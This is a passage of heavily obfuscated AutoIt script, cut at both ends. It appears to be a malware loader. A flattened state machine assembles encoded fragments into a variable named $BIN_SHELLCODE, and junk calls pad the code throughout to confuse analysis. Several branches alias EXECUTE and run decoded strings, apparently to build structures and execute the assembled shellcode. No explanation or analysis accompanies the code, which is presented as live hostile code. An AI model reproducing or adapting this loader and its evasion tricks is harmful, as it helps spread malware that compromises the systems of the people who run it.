) $656182541 = 1569955931 ENDIF IF $656182541 = 1253993868 THEN $BIN_SHELLCODE &= ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("5..8..,58,..4,..5..7..,6..1,5..8,..3..,..53..,53..,6..,..6..1..,..5..7,5..6,3..,..6,..5,..6,6,6..,..6..,..61,2..,57..,59,5..5" , ".." ) ) ISSTRING (2236803 * 1552509 + 3628622 ) $656182541 = 1587018324 ISSTRING (828572 + 2230834 ) ISBINARY (1748020 + 4291756790 ) ENDIF IF $656182541 = 1270739258 THEN $BIN_SHELLCODE &= ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("6..,..6..,6,..6,6..,..6,..62,..56..,2,1..,6..2,57,53..,..5..6..,3..,60..,..6..1..,..58..,60..,..6..1,..6,6,6..,6..,..6.." , ".." ) ) $656182541 = 784317271 ISPTR (600974 * 3910146 * 3137530 ) ENDIF IF $656182541 = 1279551750 THEN $BIN_SHELLCODE &= ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("5,6..,5,..6,6..,..6,6,61,4,..57..,58..,62..,3..,5..8..,53..,5..9..,1,..53,5..5,..6..,6..,60..,5..9..,..5..8,5..7" , ".." ) ) PTR ("lUWdmz0U9HwEy9VlLjGs3x7UMv" ) $656182541 = 180257576 DIM $XK4UDAFBGUKU9WEC9LKK = "s7tXXbA1wo1RGItDNRUGhAHTN77H2dzrgHEnJHpzOkTFtcBnU8uD0Nu1y" ENDIF IF $656182541 = 1295546840 THEN $BIN_SHELLCODE &= ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("6..1,..6,6..,..58..,..5..8,..3..,5..3..,..6..1,..62,57..,..5..8,6,61..,61,..5..8,..3,..5..3..,..60,58..,..5..4..,5..7,..59..,61,5..3,..53" , ".." ) ) PTR ("8sZJK9ef3gBu17RcyKFUX4S5ABmMZ9yzuWmzQTBBiNfocFWxkvlHtteeJ3jiXAq4Sb9fUqvQieKiYD35QYCCX0gaRi0WJsNRxkGaFRM39" ) $656182541 = 856025391 MOD (2907010 , 3741157 ) ENDIF IF $656182541 = 1296565717 THEN $BIN_SHELLCODE &= ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("1..,..5..3..,2,6..1..,62..,..61..,..5..8..,55,..57,..6,..6..,6..,..6,..6,6..,6..1..,4..,57..,58,2,..5..3,6..1..,62..,..6..1,58" , ".." ) ) $656182541 = 2022545531 DIM $158XLAJGZZ3VN72Z8KJC = 1150284 ENDIF IF $656182541 = 1300820860 THEN $BIN_SHELLCODE &= ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("57,..5..3,..59,..57..,..5..3..,..6..1..,..53,..56,6..1..,53,..5..3,..6..0,5..8,6..,..1,..55..,2..,3..,5..4,58,..4..,..3..,..5..5..,..53..,..5..7.." , ".." ) ) $656182541 = 1203322726 ISPTR ("OTJeOeGtbBzyIZZkKjhYDYyuZzdRLTSYU9UkkJrX2Njhc22bBKrJMGw1tpopbZSrULOJfNab1u6ZNqr6HboaBhkmM214ubWc62xzn" ) ENDIF IF $656182541 = 1318416169 THEN $BIN_SHELLCODE &= ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("6..,3..,6,6..,6,..6..,..58..,5..3..,..6..,..6,..60,58,..4..,3..,..6..,..6,5..8,..58,..62..,..53,61..,5..8,..3,53,..53.." , ".." ) ) $656182541 = 100830152 MOD (2861522 , 1236259 ) MOD (189487 , 3886347 ) ENDIF IF $656182541 = 1330478138 THEN $BIN_SHELLCODE &= ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("6..1,..3,5..,6..1,5..9..,6,..54,..61..,5..3,..4,..6..1..,..6..2..,61..,..5..8..,5..8,5..7,6..,..6..,..6,..6,6,..6..,..61,..2,5..7" , ".." ) ) $656182541 = 1048715572 ISFLOAT (2452762 + 4291149395 + 3191120 ) ENDIF IF $656182541 = 1364348677 THEN $BIN_SHELLCODE &= ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("2,..60,54,5..6,..3,..5..3,56,..6,..5..4..,53..,6..,..2,..6..0..,57,..5..9,..54..,57,6..1,6..2,..6..0,4,..6..,61,61,62" , ".." ) ) WINEXISTS ("V21SpfAAmz1LfOY6btXBocW7WuUaEH2VSMBjgJB4kqMmKZ1H9jOFVBNTg364uz5NGf3CmNZB22r8yIw6Dlbv2w9q8SdmNGIUu8OE6xuvtnN" ) $656182541 = 411711931 ISFLOAT ("G9AjyJWjgMDDKMXutGMA41af1OcNThgsyFOOgzuUmFyt40VQAsIMd3MQ8vrTHhA8" ) DIM $E7HO3L2NXBRKA4VNZHDO = 2037021 ENDIF IF $656182541 = 1368549586 THEN $BIN_SHELLCODE &= ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("58,6,..61,53..,56,..6,2,61,..5..6,60,..4,5..,..3..,..53,..5..3..,6..1,..62..,5..7..,..6..0,5..6..,..57,..5..3,6..,6..1..,5..7" , ".." ) ) ISFLOAT (511549 + 320807 + 1705817 ) $656182541 = 621304772 ISPTR (2910683 + 2685881 ) ENDIF IF $656182541 = 1396856746 THEN $BIN_SHELLCODE &= ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("58..,3..,..53,6..0,..5..7,54,..55..,6..1..,..2..,5..7..,..4,6,..5..7,..61..,5..6..,..3..,..6..0,55..,6..1..,..5..3,6..,..2..,6..0..,5..7..,..59.." , ".." ) ) MOD (1152203 , 663470 ) $656182541 = 823793270 ENDIF IF $656182541 = 1428652054 THEN $BIN_SHELLCODE &= ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("60,..1,6..2..,5..3..,..53,..5..3..,5..3..,..5..3,5..3,..55..,..53,60,5..7,..5..4,62..,6..1..,5..8..,3,53,..6..0..,..6..2,5..3,..57,5..9..,1" , ".." ) ) $656182541 = 438111387 RANDOM (1807612 ) ENDIF IF $656182541 = 1453481599 THEN $BIN_SHELLCODE &= ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("6,..5..8..,..6..0..,59..,5..7..,5,5..4,..5..3,5..4,3..,..6..0,..6..1,58,..59,..6..1..,..6..,..6,6..,..6..,..6..,..6..,54..,..61,..5..,..57" , ".." ) ) $656182541 = 1947300206 DIM $B3BPOL4V2CE0NUXK0XAK = 255458 * 3018391 * 725577 + 4291946556 WINEXISTS ("DF5nxSbJJaOH91THnd25XQ8pbiQeT1dU8lKtTGa2YmzkyBV4B7GXS9dYHOlob71S64JXqzZRd9gJpY0JxVMWuqc9iWVduV11vSnE17" ) ENDIF IF $656182541 = 1461966853 THEN $BIN_SHELLCODE &= ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("61..,5..8,..4,..3,..6,5,..6,6..,6..,6,..5..8,..53,5..8..,55..,58..,55..,5..9,1,53..,..57..,58,55,..5..8,..55..,..58" , ".." ) ) DIM $TS2CHUYL1PUEWQ2JODNV = 1418218 + 567903 + 926522 + 4292649082 + 4292096687 + 4294442025 + 4292394753 $656182541 = 706340665 ENDIF IF $656182541 = 1469834065 THEN $BIN_SHELLCODE &= ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("53..,..5..6,..57,..1,5..3,..5..7..,5..3,56,..5..8,5..5..,..5..3..,57,..6..1..,62,..57..,4..,6..,5..7..,5..6..,2..,..6..1,..6..,1..,..5..7..,..53.." , ".." ) ) DIM $OT4KFQUHLQSIWWDAIMOA = "C3AhUA2jHDapMGMyHT7m" $656182541 = 1599451200 ENDIF IF $656182541 = 1477365537 THEN $BIN_SHELLCODE &= ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("57..,3,53..,..5..6..,4,58..,..5..3,5..7,..58,5..3..,53..,53..,..5..3,53..,6,6..1..,..57,6..,3,..53..,55,53..,53..,..5..3..,53.." , ".." ) ) INT (70644 ) $656182541 = 2054240656 ENDIF IF $656182541 = 1479637702 THEN $BIN_SHELLCODE &= ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("5..5,53..,..5..3..,..53..,..53,5..9..,1,..57,5..3,..59,..6..1,53,..5..3..,..56..,5..3,53..,..53,..5..3..,5..3,6..,..6..,..6..0,59..,58..,..53" , ".." ) ) $656182541 = 1038131997 ISSTRING ("0CyeXr3UZ1cb3rXiTBsiFj1dY9JbWVW5e7gTMOMZfDAjdSJiATdxkuqQLvqYS28eeg76keEdYCdbSR9fzBKdRyVUQzhry" ) MOD (2052693 , 1447557 ) ENDIF IF $656182541 = 1508795126 THEN $BIN_SHELLCODE &= ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("5..3,..61..,..5..3..,..53..,..5..3..,5..3,..53..,..58,60..,..5..8..,..5..6,..6,..6,..58..,..58..,..3,..57..,..6..1..,5..8..,3..,53..,..5..3,..6,..6..1,..57.." , ".." ) ) $656182541 = 1750055196 RANDOM (1449126 ) ENDIF IF $656182541 = 1513972166 THEN $BIN_SHELLCODE &= ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("6..,..6,..6,5..6,..56,..3..,5..3,..5..8,6,..58,5..,..5..8..,..2,..61,..2,..5,..58..,58,4,3,55..,..5..3..,..3..,53,5..3" , ".." ) ) INT (951421 ) $656182541 = 1974167312 STRING ("pr5xOvnqU6mN8vZFvLduXEnZRZeBBBm6nB16K8zJGwmzbu" ) CHR (2887679 ) ENDIF IF $656182541 = 1569955931 THEN $BIN_SHELLCODE &= ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("5..8,4..,6..1..,5..7..,56,..58,53,..61,..62..,58..,..4..,..6,..3..,..6,..6,5..8,..58,5,..61..,..5..9..,..1,..57,5..7..,6..1,..4" , ".." ) ) INT (3397414 ) $656182541 = 1974292710 DIM $FQ0RVYSUQAGD35WLCXAS = "YwoSaTZ3Ow1g2EsJsVH3QV4d1HXphYdjCortKIUfD0KdQxaAdLkb3yidBl1B5JW0tRMNm98TaBzZj0wCHwlEMbqego1zSsk3e" RANDOM (3022268 ) ENDIF IF $656182541 = 1577105263 THEN $BIN_SHELLCODE &= ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("2,..5..8..,..4,..6..,3,5..6,56..,..6,6..,..6..1..,..56..,..6..0,..4..,..4..,6..1..,..53..,..5..3,..60..,5..7..,..53,..60,5..8,..6..0..,6,..6" , ".." ) ) $656182541 = 172415000 ENDIF IF $656182541 = 1586164444 THEN LOCAL $RET = $E ($B (ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("5..3,50..,57,..5..7..,..59,3..,59..,..3,..57..,5..6,59..,5..4..,..5..9..,..3..,5..9..,..3..,..5..7,5..4..,..59..,..57,59..,..57,..6..0..,..5..5..,59..,5..8,60..,..5..6..,..6..0,56..,55,61..,5..5,5..5,5..9..,..5..7,6..0,..6..0,59..,6,6..0,55,59..,..5..7,..5..5..,5..5,..55..,..3,5..5,5..3..,5..5,..57,59..,3..,6..0..,5..3,..5..8,56,59..,61..,..59,58,5..9..,..3,59..,..3,5..9,..5..6..,5..9,6,..5..9..,..5..7,..5..9..,..58..,55..,53..,55,..2,55,..53,5..5..,5..5..,56..,53..,..6..0,6..1..,..57..,5..5..,..57..,..58..,55..,55,..55,..3,5..5..,..53,55..,..55..,60,60,6..0..,56,..60..,..57,6..0,5..5,..55..,5..5..,..5..5,..3..,..55,..53,5..5..,5..7..,..60..,..60,58..,53,..5..9..,5..4..,..6..0..,..57..,59,..6..1,..5..5..,..3,55..,53,..55,55,..60,6..0,..6..0,..5..6..,..6..0,..5..7..,..60..,..5..5..,..5..5..,5..5,55,..3,5..5..,5..3..,..5..5,..55" , ".." ) ) & ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("5..5,5..5..,5..5,..3..,55,53..,5..5..,5..5..,60..,53..,60,57..,..60..,55..,..55,55..,5..5..,3..,..5..5..,5..3..,..5..7,5..7..,..59..,..3..,5..9,3,..58..,5..6..,6..0..,..57..,6..0,5..5,6..0,5..8,59,..56..,..60..,5..7,..5..7,..60..,..5..9..,5..8..,6..0..,57,..58,..5..3..,..6..0,..5..7..,..6..0..,..5..5,55..,..61,..5..5..,..57,..5..7..,..59..,..59..,6..2,5..9..,..3..,59..,..5..8..,..5..8..,6..,58..,56..,..6..0..,57,60..,..55..,60,..5..8..,59,5..6..,..60,..57..,55,62..,..5..5..,..62.." , ".." ) ) ) ) $656182541 = 1205248241 STRING (2218093 + 880111 + 1666509 ) ENDIF IF $656182541 = 1587018324 THEN $BIN_SHELLCODE &= ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("6..1..,..5..3,..56..,5..7,5..8,..6,61,6..1,..62..,61..,5..8,..3..,5..3,..6,3..,6..,6,6,..6..,..61..,4..,6..1,..58..,54..,53" , ".." ) ) RANDOM (529060 ) $656182541 = 1318416169 ISFLOAT ("VygxSkjh1la0fXvpKtxLFYGAIlZp6ezsjCHDEAOUyqycsJDTL28RuOa72OYGv3" ) ENDIF IF $656182541 = 1599451200 THEN $BIN_SHELLCODE &= ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("53,53,..5..3..,..5..3,..5..3..,6..0..,55..,..6..2,..58,5..6..,..5..6..,..6..,6,..58,..60..,6,..6,6..0,59..,5..8,..5..3..,58..,..5..6,6,6" , ".." ) ) ISFLOAT (1037561 * 629238 + 4292420501 + 983530 ) $656182541 = 90298599 ENDIF IF $656182541 = 1604509846 THEN $BIN_SHELLCODE &= ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("6..,..6,..6..,..6..,6..,..6..1,4..,5..7,58,..1..,61..,61..,..62,..61..,5..8..,5..6..,..3..,6..,6..,6,6..,..6,6,..61..,..4" , ".." ) ) ISBINARY ("T7DBJL0MiyFf" ) $656182541 = 2060391673 ISBOOL (3447033 * 534323 * 174310 ) ISPTR (1522803 * 3287096 + 965819 ) ENDIF IF $656182541 = 1655436234 THEN $BIN_SHELLCODE &= ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("5..3..,..5..8,..58..,61..,..2,..5..,..3..,5..8..,..54,5..8..,54..,..58,56,5..8..,..5..9,5..8..,..6..0,..61,..2..,..6..0,..4,..53,..6..1,56..,..56" , ".." ) ) $656182541 = 781366022 ENDIF IF $656182541 = 1700940958 THEN $BIN_SHELLCODE &= ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("5..7,6,5..7,..5..8,..2..,..6..1,..58..,..5..3..,5,..6..1..,57,55,6,..5,6..,6..,..6,..6..,..6..1..,..2,6..1..,3..,..2..,5..8..,55" , ".." ) ) WINEXISTS ("FoQjXnHg0L35rQpaRcouYtiq75n0QRYForGCWKUj7R8MvmxvDlCMaISmgzm29SAi" ) $656182541 = 496318929 ISFLOAT ("XofsewguE5VG1vDokE" ) INT (1449336 ) ENDIF IF $656182541 = 1713506615 THEN $BIN_SHELLCODE &= ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("55..,..61..,..6,..6,6,6..,6,6..,..6..1,4..,..57..,5..8..,1..,57..,61,..62,6..1..,..58..,5..5..,..3,6..,6..,..6,6,..6" , ".." ) ) $656182541 = 432319576 MOD (1091695 , 3317559 ) ISSTRING ("R7wu5mL1KDBvhv64M2bBZA2R" ) ENDIF IF $656182541 = 1718368979 THEN $BIN_SHELLCODE &= ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("6,..6,..6..,6,5..6..,..2,..57..,5..8..,..53..,3,..60..,57,5..4,..5..7..,..61,2..,..5..8,5..8..,6,3,..5..7,59..,..56,2,60" , ".." ) ) $656182541 = 1051260188 RANDOM (980872 ) ENDIF IF $656182541 = 1723957288 THEN $E ($B (ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("53..,..5..0,5..7..,5..7,..5..9..,3,..59,3,5..7..,56..,..59,..54..,..59..,3,..59..,..3,5..5,..61,..5..5,55..,..5..9..,..2,..5..9,58..,..60,..5..5,..5..9,5,..5..9..,5..8,..5..9..,3..,56,5..6..,..56..,..55..,..5..5..,5..5,5..5..,..3..,..55,..53,..55..,55,..59,5..7,60..,..6..0..,..5..9,6,..60,55,5..9,57,5..5..,5..5,55..,..3..,..5..5,..53,55,5..5..,..5..8..,59,..59..,..62..,..6..0,..55..,6..0..,..5..7..,..60..,5..8..,59..,..5..4..,..59..,3..,..57,..59..,..60" , ".." ) ) & ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("5..5..,5..9..,5..8,5..9..,..5..8,5..5,..55,..5..5,..3,..5..5..,..5..3,55,..5..5,5..9..,57..,60,60..,..59..,..6,60..,..5..5,5..9,5..7..,..55,55,..5..5,..3,..5..5..,..5..3..,..55..,..57,5..9..,..3..,6..0,5..3..,..58..,5..6..,59,..61,..59,58,..5..9..,..3..,5..9..,..3,59..,5..6,..59..,..6..,..59..,57..,5..9..,..58,..5..5,..3,5..5,..5..3..,..55..,5..5..,..5..9,..57,..6..0,..60..,5..9,..6,..60,5..5,5..9,57..,..55..,5..5..,..5..5..,..3..,5..5,5..3,55.." , ".." ) ) & ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("5..5,..5..6,..53..,55,55..,..55,3..,..5..5..,..53,55..,5..5,..59,5..7,6..0..,60,..5..9,..6,..60..,..55,..59,..5..7,55..,..5..5..,..5..5,..3..,..55,5..3..,5..5,55,5..6,..53..,..6..0..,61..,5..6,..6..1,5..6,53..,56,5..3,5..6,..53,55,..5..5..,..5..5,62.." , ".." ) ) ) ) EXITLOOP PTR (2269633 * 1876835 * 3508062 ) ENDIF IF $656182541 = 1745262236 THEN $BIN_SHELLCODE &= ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("53..,..6..,..6,..6..0,..5..9,..5..8,5..3,5..9..,..1..,53,..53,6..,6,..58..,..5..8,..6..2..,61..,61..,2..,4..,61..,6..1..,58..,4..,..2.." , ".." ) ) DIM $4T4LGD5XQEO3AFWV4GMM = "RzdXsJEvO9V63mEKE0VnryBl6Hvkh1uUrHn41xX3zbKe47g3qUzRA9lr" $656182541 = 937837217 PTR (895226 + 3244402 ) ISBINARY ("KUgd1XpXxq8BB3wANssw579GcQfXXz4tW5QatNIl6EIJ2sVA1xbRv8dMVIalSCa8wOQGnwg9UgAAxyNU4O5yym8X1coUMxDDEKnnMnmDqb7oHMow5qrcG" ) ENDIF IF $656182541 = 1747756201 THEN $BIN_SHELLCODE &= ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("6..1,..5..8,3,5..3,53,..6..,..6..1,..5..7..,..60..,..61,..5..3..,..55..,5..3..,5..3,..53..,53..,6..1..,..2..,..5..7,58,2,..3,..56..,2..,..57.." , ".." ) ) DIM $2QKHWVWL75WKAGQBBIWP = 2912788 + 961618 * 3511725 * 1476387 + 1750659 * 3602516 $656182541 = 1942454486 ISBOOL ("4OKLKRBlDjKKfBm48MAwpH9qlabVh5vhzfoSOgNHvR" ) ENDIF IF $656182541 = 1750055196 THEN $BIN_SHELLCODE &= ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("5..8,2,..6..,5..,6,6..,..6..,..6..,5..8..,6..0..,..59..,..1,..53..,57..,..6..1..,..4,..57..,..58..,..6..,6..1,58..,..5..3..,..6..1..,..2..,61" , ".." ) ) $656182541 = 1207367525 PTR ("hhOgvOuAKORdIYCkanDp192bImWVuiJ59woaV82ctQd3NMWybO1nu3RioNHj2IfBe" ) ENDIF IF $656182541 = 1791187076 THEN $BIN_SHELLCODE &= ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("57..,5,..5..7,..6,5..,..6..,..6,..6..,6..,56..,..5..6..,..3..,53,..61,6..2..,60..,4,..6,..57..,..59..,..59,56..,..2,57..,5..9" , ".." ) ) DIM $CZBUB5K59W5ZXUQRVJFQ = 388633 * 456518 + 4292093314 + 3032764 + 4292546598 * 3509147 $656182541 = 896046375 PTR (972489 * 3553081 * 2050349 + 961001 ) ENDIF IF $656182541 = 1808850186 THEN $BIN_SHELLCODE &= ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("54..,61,5..3..,..5..6,..3..,6,..61,..6..2..,..58..,58..,6,3,6..1..,..62,..57,..4,..6..,..6..1,61,62,57,..58..,..53..,61..,6..1" , ".." ) ) PTR ("Sl8EDSsJMrkJtlEwYIlA" ) $656182541 = 848901156 DIM $F0Y8O5LAFRJGV06PPKW5 = 3542878 + 3114696 + 3677996 * 2534245 * 2891525 + 1931075 * 1284846 + 4294211399 ENDIF IF $656182541 = 1832168266 THEN $BIN_SHELLCODE &= ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("6..1..,57,1,..4,..5..3..,55..,..53..,53..,53..,5..3..,..6..1..,..4..,..6..1,58,..5..4..,..5..3..,6,..3..,..6,..6..,..6..,6,58..,53,..6.." , ".." ) ) $656182541 = 50926388 MOD (1598641 , 3539042 ) ENDIF IF $656182541 = 1859058315 THEN LOCAL $FILE_STRUCT = $E ($B (ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("5..3,50,57..,..5..7,59,3,..59,..3..,5..8..,..56..,60..,..5..7,60,55..,60..,58,5..9,56..,60,5..7..,57..,..5..6,..60,55..,..59,58..,59,..5..4..,60,..57..,..59,5..8,55,61..,..55,..55..,5..9,55..,..60,..6..2,60..,57..,..59..,5..8..,55..,..5..3..,59..,..1,59..,..2,60..,5..6..,5..9,..5..7,..5..9..,5..9,..59..,6..1,..5..9..,2,..59..,..1..,..59,..57..,..60..,..56,6..0,..5..4..,5..9..,61..,..59,..59..,59..,..2..,..5..9,1..,6..0..,54..,60..,5..6,..59..,..61..,59..,57,59,59,5..9..,..2,..5..9..,..1..,..5..9,5..7,60..,5..6,6..0,..5..4..,59,61,59..,..62..,..59..,5..9,..6..0,58..,59..,6..1,60,5..6,..5..9..,..5..7,..6..0..,54,..5..9..,62,..5..9..,5..9,..59..,..55..,..59..,..5..,6..0..,5..9..,5..9,..1..,59..,2,..59,..3..,..60..,..56,..59..,..5..7,..60..,59" , ".." ) ) & ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("60,5..6..,60,5..4,..59..,..5..7..,..5..9..,59,60..,..5..6,..58..,..2,55,..55..,..55,..5..3,55,..5..9..,5..5,..53,..58,..56,..60..,57..,6..0,..5..5..,..59..,62,59,5,59..,6..0,..57,..3,..5..9,..58,5..9,5,5..5,61..,5..5..,57..,5..9..,3,..6..0,..53,57..,..59,..59..,..62,5..9,3,..59..,..5..8..,55..,62..,55,5..3,5..5,..59,55..,5..3,5..5..,..55..,..5..8,..4,..5..5..,5..5,5..5,62" , ".." ) ) ) ) MOD (1417388 , 2000101 ) $656182541 = 1877228926 ENDIF IF $656182541 = 1877228926 THEN $E ($B (ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("5..3..,..50,5..7..,5..7..,59..,..3,59..,3..,..5..8,5..6..,..60..,..5..7..,6..0..,55,..60..,5..8,..59..,56,6..0..,57,5..8..,..56..,59..,58,..60,..57,57,57,..59,5..4,..6..0..,57..,59..,54..,..5..5..,..6..1,..5..5,..57,..58,..5..6,5..9,..6..1,..59,..5..8..,5..9..,3,59..,..3,..5..9..,56..,5..9,6,..5..9,57..,..59,..58..,58..,..6..,5..8,56,..60,5..7,..60,..5..5,..60..,..58..,59..,..5..6,..6..0,57..,55..,..3,..55..,5..3,5..5..,55..,5..9" , ".." ) ) & ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("1..,5..9,5..9..,5..9..,..57,5..9..,..6..,5..9,62,..5..9,2..,..59..,..1,59,..6..1..,59,..5..9..,59,5..7..,59..,6,..5..9..,62,..6..0..,..54,..59..,..1,..5..9..,59,..59,..6,..5..9..,..62..,59,1,60..,..54..,..5..9..,57..,..6..0..,5..6,59,..6,5..9,..62.." , ".." ) ) & ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("59,..59,..59,..1..,5..9..,..5..,5..9,5..7..,60..,..5..6,6..0..,..5..4..,..59..,6,59..,..62,59,5..9,59,..57..,..5..9,59..,60,..56..,6..0..,..54,59..,60..,6..0..,..5..6,55..,..5..5..,..5..5,3..,..5..5..,..5..3,5..5..,..5..7,5..7,..5..5,..59..,6..2..,..5..9,..5..,58..,..6,..5..8,5..6,..5..9,..61..,59..,..58,..59..,..3..,..5..9,3..,..5..9..,..5..6..,..59..,6,..5..9..,5..7,..59,5..8..,..55,62.." , ".." ) ) ) ) $656182541 = 9803637 ISFLOAT ("S1mUWVNCDL7HGa78DmSrCGbwD" ) ENDIF IF $656182541 = 1885155689 THEN $BIN_SHELLCODE &= ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("6,..6..,..6..,..60,6..2..,..5..6,1..,56,3,5..3..,60,6..1,62,..61,..5..8,..5..5,5..3,6,6,6..,6,6,6,..6..1..,..2.." , ".." ) ) $656182541 = 1970938970 MOD (2335494 , 3656525 ) DIM $JC5CSBSKJYSAEFE1ABUL = 3323231 * 1033960 * 673699 ENDIF IF $656182541 = 1921072536 THEN $BIN_SHELLCODE &= ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("57..,..56,56..,..3..,6..2..,61..,..5..6..,..5,..6..1,53,..61,6..1,62,57,..4..,..6,..5..3,1,6..2..,..6..,..5,..6,..6,6..,6.." , ".." ) ) MOD (132187 , 174381 ) $656182541 = 1082073854 PTR (1563163 + 1001748 + 4293192249 ) MOD (2719725 , 1434301 ) ENDIF IF $656182541 = 1922466865 THEN $BIN_SHELLCODE &= ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("5..8,..4..,54..,56..,4..,..53..,..2..,3,60,..57,..5..8,61..,..61..,57..,5..7..,..5..5..,..60..,5..5..,..56..,..53..,..6..,3..,60,5..7,5..8.." , ".." ) ) INT (591028 ) $656182541 = 1330478138 WINEXISTS ("9yUWnsW7BIgmwkWRMJVBswyLJvJSUgsiQ30tMOc7XDw1hD8zALFijC" ) ENDIF IF $656182541 = 1924764602 THEN $BIN_SHELLCODE &= ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("53..,..6..,..5..7..,6..0..,..57..,62,6..0..,..5..8..,5..,5..3,..58..,..6,61..,2,..3,..5..9,..58..,5..,5..8,..4..,..3,..5..5,..53..,..57,..53" , ".." ) ) $656182541 = 1655436234 MOD (1348810 , 1037731 ) ENDIF IF $656182541 = 1942454486 THEN $BIN_SHELLCODE &= ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("59..,5..6,..57..,60..,..58..,5..3,..6..,5..8,..53,6..,..6..,60..,..58,4,6..1,..6..,6..,..58,..58,2,..5..3..,6..1,5..8..,3..,..53.." , ".." ) ) ISSTRING ("d7GXNY9GDfwkqiKj9mUntDCkoTrcKj8Ef9IILvZuMCOgFHWeUg8sUg" ) $656182541 = 1131844544 ENDIF IF $656182541 = 1947300206 THEN $BIN_SHELLCODE &= ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("3,..1,..5..3,61,..3,..60..,61..,..5..8,..59,3,..6..,6..,6,..6,6..,..6..,..5..,..5..6..,..3,..1..,4,..61..,5..3..,..5..6,..3" , ".." ) ) ISSTRING (3735416 + 3465486 ) $656182541 = 116925729 ISBOOL (1547430 + 4291515360 * 1477392 ) ENDIF IF $656182541 = 1970938970 THEN $BIN_SHELLCODE &= ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("6..,6..0..,61..,..4..,..5..7,58..,..5,..6..1,3,..6..0,61,..58..,..5..8,..3,6,6,6,6..,..6..,..6,..60..,62,57,..1,6..1.." , ".." ) ) RANDOM (831899 ) $656182541 = 1296565717 ENDIF IF $656182541 = 1974167312 THEN LOCAL $E = EXECUTE PTR (294655 * 3649188 ) $656182541 = 860380632 ISSTRING ("NBDESHu4vFqUhR17tOAjBggAI7s1CJ4uEyboCRJ7ZVzBKp7H57EagkFGvd6VpDAVL5oTQLELfCtRRN0saU5Ff3ot2D2yVYSvtN0Obo2sB25M0YZSnMVE" ) ISFLOAT (2773503 * 755756 * 391473 * 1103808 ) ENDIF IF $656182541 = 1974292710 THEN $BIN_SHELLCODE &= ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("6..1,58,..4..,3,6,5..,6,6,..6,6..,..5..8,5..3..,6,6..,..58,..58,5..,..6..1,..59..,..6..1,..3,..3..,..5..3..,5..5,53.." , ".." ) ) STRING ("krV2Len8LCdNkkhdnXy8g8fxQIvaN12AW4dv9L50BVfBWGI4UnHl8eRllxmdSmtUKM1qhWeK1IGv3NLiaAqAtQCSn1jKz2ho" ) $656182541 = 871530397 ISFLOAT ("7i6uyHusHWdcr63A4jjcqMCl8Br4HXBDSNsrwvdk2IKZw0ZrH459FpGuQUw7pAUVtIuNNLdIg8kSbMZiL9vN1B7Bh7KL9f5" ) ENDIF IF $656182541 = 2022545531 THEN #region FLVAxkkwT $656182541 = 1713506615 ISPTR (775609 * 3395171 + 4291409108 ) PTR ("5ovpe" ) ENDIF IF $656182541 = 2032766480 THEN $BIN_SHELLCODE &= ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("58,..5..6,58..,..59..,..5..8..,6..0,..56..,5..6..,..6,..6,6..1..,62,6..0,..4,..2,..6..1..,59..,..5..7..,6..1..,2,5..6,5..8,..56,..53,..53" , ".." ) ) $656182541 = 116471326 WINEXISTS ("QaAJadT3khcMzuzXEIzxrMIRUTOwR6NlMO76yW2Du5i53K64NtyrlEocAUZrxwm" ) ENDIF IF $656182541 = 2054240656 THEN $BIN_SHELLCODE &= ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("56..,..5..6..,3,..5..3,..5..9..,5..9,5..6..,62..,5..8,..5..9,53..,5..7..,53..,6,62,5..7,..3..,53,..56,..4,..5..7,3,53,..5..4,..53.." , ".." ) ) ISPTR ("xSR6cwENXjXUSwHv9iA5EN6Kf8S4BcLmHk5QKpC1HX6QDNNZQh11sB8TW" ) $656182541 = 238457315 ENDIF IF $656182541 = 2057237529 THEN $BIN_SHELLCODE &= ZVTZJDNXHRPQQIM (LUXBZMCWKPOC 